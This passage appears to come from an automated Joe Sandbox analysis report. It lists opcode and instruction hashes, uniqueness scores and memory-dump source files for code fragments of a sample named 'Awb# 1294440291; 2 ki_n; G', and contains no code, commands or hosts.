                                                • Instruction ID: 02fbd44ddfb2be93776b740b07d0eee76611f38ccc7b77f9e51a0fc3e00f56e9
                                                • Opcode Fuzzy Hash: 1b71574953c3c3bdc15f00eb71eca491af005666a772e9ad34149d0ce07a4d87
                                                • Instruction Fuzzy Hash: 42413236800B09DFCB00EF68C4449A9F7B1FF99314B15CB5AE5586B221EB31E5C5CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fdc00510ea80d698c0e216858330da6dff119bbebc27bec86db8e95e60b226f4
                                                • Instruction ID: 7769aa09af883ef9fd6567d1d4e4e29ce18f141e354ac736fb1aa2dc1d874fdc
                                                • Opcode Fuzzy Hash: fdc00510ea80d698c0e216858330da6dff119bbebc27bec86db8e95e60b226f4
                                                • Instruction Fuzzy Hash: 5231CF31A04219DFCF10DFA9D8804BF7BB6FF45301B58896AE846DB352E635E842C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d88e4ed15e903521a408a5e9160dc7026de28a52d0c2ddf3f78b0bce4273b3b5
                                                • Instruction ID: 5c4cc3c20c0e010076b94f7e4511fd946469d1448c418f3af5208262184714fe
                                                • Opcode Fuzzy Hash: d88e4ed15e903521a408a5e9160dc7026de28a52d0c2ddf3f78b0bce4273b3b5
                                                • Instruction Fuzzy Hash: BC41AFB0D003599FDB14CF9AC984A9EFBF1FF48710F24826AE418AB264DB755845CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f34d9db2dffa59d5d7f70ddfc8271867b391e4b4a1eb1c119641bbef636113dd
                                                • Instruction ID: 8501a54d7cdcb3d17336b71867e9a87309de3d1f337c18fd8b25691acf49623c
                                                • Opcode Fuzzy Hash: f34d9db2dffa59d5d7f70ddfc8271867b391e4b4a1eb1c119641bbef636113dd
                                                • Instruction Fuzzy Hash: E0217171B002455FCB10EB99C8149BFBBFAEFC4210F14816AE964E3250EA749A05CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8222331c526289b290111c0743ec9e4f8e6482afbea722b018f7f747d2894c8c
                                                • Instruction ID: 930f31671dad62ab5b1ca3da445b654d686f0c541c24344623a54f2e870ad275
                                                • Opcode Fuzzy Hash: 8222331c526289b290111c0743ec9e4f8e6482afbea722b018f7f747d2894c8c
                                                • Instruction Fuzzy Hash: 49311232810B09DECB01AF78C854899FB71FF95340F118B5AE9596B221FB30E695CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a419f4f9436ae80a2d0e220fa07790ad845e611adc7bd5618318ec1d7252ad12
                                                • Instruction ID: b3738289e896dc07331763175b24a9d703dae67458c8fc5bd00e3993410f9d58
                                                • Opcode Fuzzy Hash: a419f4f9436ae80a2d0e220fa07790ad845e611adc7bd5618318ec1d7252ad12
                                                • Instruction Fuzzy Hash: A6216A703502108FCB68EB28D854A2A77EAFF85714B1085AEE506CB3B5DF72EC46CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9646cf90a2c99d4efae13ab17a3c0a4f9d38489a3af3e96b32ebf573b42225da
                                                • Instruction ID: 8adc297bf3470f08a3f2916426a13c8381d388beeaf4f4a60aecdd71968ca215
                                                • Opcode Fuzzy Hash: 9646cf90a2c99d4efae13ab17a3c0a4f9d38489a3af3e96b32ebf573b42225da
                                                • Instruction Fuzzy Hash: 8831F132910B09DECB01AF78C854899F771FF95350B118B5AE9596B221FB30E695CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4342d447f00c083966b7c41c349c5bda43305924b46a53848876fc2b5e8fe03
                                                • Instruction ID: b6f06db22ce5a08209f4dd80752d8279ac246884db9bf736cbe108ef543e1606
                                                • Opcode Fuzzy Hash: a4342d447f00c083966b7c41c349c5bda43305924b46a53848876fc2b5e8fe03
                                                • Instruction Fuzzy Hash: 8F210636600512DBCB119F98D588B7BB7AAFB84316F548525E806D7390DF39CC41C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b5c194385b515d50b222ab0a63c8e374e88f2660b996631fb2808b02bf597ce
                                                • Instruction ID: c02dda54fdc1a48555ea3846f13510365e96601ec0660ed27ece6457def44f33
                                                • Opcode Fuzzy Hash: 4b5c194385b515d50b222ab0a63c8e374e88f2660b996631fb2808b02bf597ce
                                                • Instruction Fuzzy Hash: 752129357406109FCB24AE19D584E7AB7B7FF84721B54892AE60687B51CB71EC41CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733878030.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_130d000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c200fe6054e4eeb79f2f93314b5af0a975d5f4c03e27aae8a51029ec6c9245ce
                                                • Instruction ID: e9da7ab5200ef00c4e2b5a18216bf62c08bea8aa494ce724d8e2f2e65a67c40e
                                                • Opcode Fuzzy Hash: c200fe6054e4eeb79f2f93314b5af0a975d5f4c03e27aae8a51029ec6c9245ce
                                                • Instruction Fuzzy Hash: C1210471504204EFDB06DFD8D9D0B26BBE9FB84328F20C66DE9094B296C336D446CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733878030.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_130d000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0fecc30ac8f795304c356ea79cbdc1d9857d5bbf8195b642c4f2e0e427f709b2
                                                • Instruction ID: 585426bfbe055ea9f22123653e08968cb563dd81cceae426480825bd29eb38bd
                                                • Opcode Fuzzy Hash: 0fecc30ac8f795304c356ea79cbdc1d9857d5bbf8195b642c4f2e0e427f709b2
                                                • Instruction Fuzzy Hash: E8212271604204DFDB16DF98D994B26BFE5FB84318F20C56DD80E4B696C33AD447CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 013677c9b2b2d338cb4d75cd5e7c220ca46f956da51d25ac3e607018413c7f0d
                                                • Instruction ID: 688647213e2b8445cfd0c9df0cd1617a26456fd1b0a9484a7d7330ce61351794
                                                • Opcode Fuzzy Hash: 013677c9b2b2d338cb4d75cd5e7c220ca46f956da51d25ac3e607018413c7f0d
                                                • Instruction Fuzzy Hash: 2A11D3353502104BEB056B29D82175FBAEBEBC5704F10406AF246DB3DACDB9EC455BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a75206da82a41eb80d545f4976d22313107d1ff7138782344277156d2bba1db
                                                • Instruction ID: 5c05f0068453324c51c66f3605c7bef1977caa0310b2ed28072fc9d8012a978e
                                                • Opcode Fuzzy Hash: 7a75206da82a41eb80d545f4976d22313107d1ff7138782344277156d2bba1db
                                                • Instruction Fuzzy Hash: 34218E75A0021ACBCF00DF69D9805BFBBB6FF44301B188966E855EB312E735D911CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bee40abd135b7918ad3d52905d707b8da714ea24e63a0a2b604ea3a1c77ab2e3
                                                • Instruction ID: 3a98158bf38f512aaa4a7eb007fc32761dcdf3e5856246acc5dcfef013b0c681
                                                • Opcode Fuzzy Hash: bee40abd135b7918ad3d52905d707b8da714ea24e63a0a2b604ea3a1c77ab2e3
                                                • Instruction Fuzzy Hash: D311E7343502104BEB046F29D82176FB6DBEBC5704F10802AF246DB7DACDB9EC455BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 820534899419d83ba7c8b7c63df18e421b7250d15a4580ea7034cd8e89fc356d
                                                • Instruction ID: 79f0071aea243947ed2d26fd10eac1734ef05b922babd83d521810628bfdefec
                                                • Opcode Fuzzy Hash: 820534899419d83ba7c8b7c63df18e421b7250d15a4580ea7034cd8e89fc356d
                                                • Instruction Fuzzy Hash: 1E111735B006109FCB24EE19C588E7A77B7BF88710F54892EEA0687B51C735EC41CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64b9c2e1c4d69c7df7c6870193e848c99a9f9e9738ab18fa1c387cbf0005f46c
                                                • Instruction ID: aacf1bc23b1726e45f3b004447a7a3d5446838ecbf795a53276071ec2d37bc3e
                                                • Opcode Fuzzy Hash: 64b9c2e1c4d69c7df7c6870193e848c99a9f9e9738ab18fa1c387cbf0005f46c
                                                • Instruction Fuzzy Hash: 9D21D2B1C01258DFDB20DF99C988B9EBFF5AB08314F24846AE418BB250C7B55985CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8ae632f320b796ffacd251029235af5212e5e23bca24b34e64cce545ecbde52
                                                • Instruction ID: eaf9df76edd94f70206c919fa7429bcdd045e74d3a34c8304a98345563b6ba8d
                                                • Opcode Fuzzy Hash: a8ae632f320b796ffacd251029235af5212e5e23bca24b34e64cce545ecbde52
                                                • Instruction Fuzzy Hash: 2D21DB71E1020A9F8B44DFADC8849AFFBF9FF98300B10C55AE519E7214E770A952CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca48f3d6fda39ab1359288e5d91f46b1596e0184d2886956dca50f4dbccf567e
                                                • Instruction ID: 2655f2f3654cc9270780262a331034065460f477b27a961489fc773fb71c65da
                                                • Opcode Fuzzy Hash: ca48f3d6fda39ab1359288e5d91f46b1596e0184d2886956dca50f4dbccf567e
                                                • Instruction Fuzzy Hash: A0213B75E0020A9FCB05DFA9C9848AEFBF5FF88300B11855BE418E7211E770AA52CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a532ef15f4c8fe24ac489d0f1d85508b8b1a1a44e498d8b23a5ea79cf3d8e935
                                                • Instruction ID: 7109a2352c0e3d566a36ea97eb878cd5dfb834fb139b68e9ad114d2d61680f33
                                                • Opcode Fuzzy Hash: a532ef15f4c8fe24ac489d0f1d85508b8b1a1a44e498d8b23a5ea79cf3d8e935
                                                • Instruction Fuzzy Hash: 5D2193B4A10908DFC748DF5AE08599DBFF1FF88320F5280D5E4489B365EB319995CB01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0e30a200d20ed96d6e730d702e1cb9aa1ae836c6d9a5eb175ebabd550860ce5
                                                • Instruction ID: 5cdcd0638177c6cca639af685553eff95a997e85975512726aa4393c9791e03a
                                                • Opcode Fuzzy Hash: c0e30a200d20ed96d6e730d702e1cb9aa1ae836c6d9a5eb175ebabd550860ce5
                                                • Instruction Fuzzy Hash: 721170303042005BDB28E665C850B7AB79BFBC4314F14C63DA50A9B794CBB5E846CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13881df36c13f92beaed7c50445d3b59c2591ecf9ad3317784ad7f652241ea43
                                                • Instruction ID: afd3800ddf767da211bf49cd38c2afafc5de878c384faf8d1404c01766927f9c
                                                • Opcode Fuzzy Hash: 13881df36c13f92beaed7c50445d3b59c2591ecf9ad3317784ad7f652241ea43
                                                • Instruction Fuzzy Hash: B51102B2B083889FCB05CBB8C8196AD7BF4DF51200B6008BAE845C7352ED35EE118312
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ba27f6203309e62c6219d469007cdb933deaa990379407b37e9bda42e1eb1c8
                                                • Instruction ID: a5d34b6cc948eb75a58c766ec948de9ebd196f02edb09f763f47e5396b03f6a9
                                                • Opcode Fuzzy Hash: 7ba27f6203309e62c6219d469007cdb933deaa990379407b37e9bda42e1eb1c8
                                                • Instruction Fuzzy Hash: 6101AD317102248BCB18ABB898147BF7AAAEFC5650F10802EA60A9B394DF358D49C7D4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f2815ad9fd1d87ec2eba2f18d007532b08d3e1626855c78f2ebcd45b153a25f3
                                                • Instruction ID: 4f0c43fdc16b1ff259d283923f2fdb4cd487ca47c0322e91309df784858296c9
                                                • Opcode Fuzzy Hash: f2815ad9fd1d87ec2eba2f18d007532b08d3e1626855c78f2ebcd45b153a25f3
                                                • Instruction Fuzzy Hash: AF11A0343042008BDB28EA24C9A0B7AB797FB84314F14C63EE5069B794CBB4E846CB44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3bfbd1be6ff3d0d8dfc8873b9685c410b0a2e6fd773f2ecbfa1294b97f0f2dc
                                                • Instruction ID: 7cda463ab4c38ab6f60791c40c587cd4b987cb20eebb4cafd6ba555b69c79708
                                                • Opcode Fuzzy Hash: a3bfbd1be6ff3d0d8dfc8873b9685c410b0a2e6fd773f2ecbfa1294b97f0f2dc
                                                • Instruction Fuzzy Hash: 5321D0B59003499FCB10DF9AD988ADEBBF4FB48320F10842AE919A7211C375A955CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733878030.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_130d000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 0c2b47f973219688821f4aa724e621b4fec506a4d5477b68d311949ea32b4e1b
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: A711D075504280CFDB12CF54D5D4B15FFA1FB44318F24C6AAD80D4B696C33AD40ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733878030.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_130d000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 347b1572ee0c38aa7518ad271c66ae77d42534c4d6eca3d9199951f79e65b1aa
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 5211BB75504280DFDB02CF98C5D4B15BFB1FB84228F24C6AAD8494B696C33AD40ACB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3fab7406b5f32af5da137da7da414b94cb67d7a13701c9f876942f9eb7044bb1
                                                • Instruction ID: 2fde224c325f184cd1b4d54682b90b817b88ce7cae41ee97d22cd6b0747ca900
                                                • Opcode Fuzzy Hash: 3fab7406b5f32af5da137da7da414b94cb67d7a13701c9f876942f9eb7044bb1
                                                • Instruction Fuzzy Hash: 7611F3B5D006489FDB10DF9AD848ADEFBF8FB48320F14841AE459A7310D778A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 421126a30500b82e00ec3cfa1f08237e060134825e2266a7c65be4c41beb124f
                                                • Instruction ID: 65630521962f573c7fb1140a386d13a5edb4b3b30c507fb02927f113cabe0585
                                                • Opcode Fuzzy Hash: 421126a30500b82e00ec3cfa1f08237e060134825e2266a7c65be4c41beb124f
                                                • Instruction Fuzzy Hash: 8A1104B5D006488FCB10DF9AC448A9EFBF4EB48320F14851AE559B7320D374A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a0df8c78ef2ac324343ffacc4deace9ad01532aa2ee4e44d1aa1c55e2ef7b0b
                                                • Instruction ID: 3a7410520d4196368c744a3718a4d998e5a5f377a570f581c6b65cd0b2ce2484
                                                • Opcode Fuzzy Hash: 1a0df8c78ef2ac324343ffacc4deace9ad01532aa2ee4e44d1aa1c55e2ef7b0b
                                                • Instruction Fuzzy Hash: 3E113C75A00609CFDB24FFA4C5547BD7AB3EB44321F18452AD802A7290DFB84981CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13f891a35f439f9d31c897f65ca8f624c7f888e539a011685b28a10f0dbb5b9d
                                                • Instruction ID: df20c824243e72df9b60f6dbb4f20499584e89899a639be9e84c01d835399df2
                                                • Opcode Fuzzy Hash: 13f891a35f439f9d31c897f65ca8f624c7f888e539a011685b28a10f0dbb5b9d
                                                • Instruction Fuzzy Hash: 591103B5900248DFCB20DF9AC544BEEFBF4EB48324F20851AD959A7350C375AA44CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8669fbc3eb6d8d740b55bf6cf84eec66af73ae483c1a187357117d2ba001091
                                                • Instruction ID: e648b9e361cff77da067d0e578e1e9dd58cd988532642637134ecf5c4bf85be1
                                                • Opcode Fuzzy Hash: e8669fbc3eb6d8d740b55bf6cf84eec66af73ae483c1a187357117d2ba001091
                                                • Instruction Fuzzy Hash: 401103B59002489FCB20DF9AC544BEEFBF4EB48324F20851AD559A7350D375AA44CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93e0ba027c773142777d9e80526ed46758914e06c864e4409c206887e4313a33
                                                • Instruction ID: 2c5a7cb2b77930622a2769d9d605e8a7e393599da7108c5d063dde7153571f77
                                                • Opcode Fuzzy Hash: 93e0ba027c773142777d9e80526ed46758914e06c864e4409c206887e4313a33
                                                • Instruction Fuzzy Hash: 8801B13290AA22BBC725AF09D100635FBB8BF54710B1983AAD45953F40CF31B891C7E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72337e4432be0f2f004bf220b0a52495be80f5c4af3871ce9fa937e36f907d35
                                                • Instruction ID: 52742dd1bfa634637f795bfd5e1afc63a6002bc27fbff0faf26931c80b6bee70
                                                • Opcode Fuzzy Hash: 72337e4432be0f2f004bf220b0a52495be80f5c4af3871ce9fa937e36f907d35
                                                • Instruction Fuzzy Hash: AEF0A971B001159BCF15BFA99955ABE7BBAABC8620F00026EEA05A7380DE700D11C7D9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1795ef247bf0b28fb403f9dc0a34b5ad52903019c61648dd09825e4aa7459246
                                                • Instruction ID: a3298d5d2046f856c6d9a348a0a2b156b8680db64b8f2e8e37b6dbdb2d0bf563
                                                • Opcode Fuzzy Hash: 1795ef247bf0b28fb403f9dc0a34b5ad52903019c61648dd09825e4aa7459246
                                                • Instruction Fuzzy Hash: B5117330200B408FC724DF29D54870BBBE6EB84324F10976CE09A47BA4DF74A8098FC1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
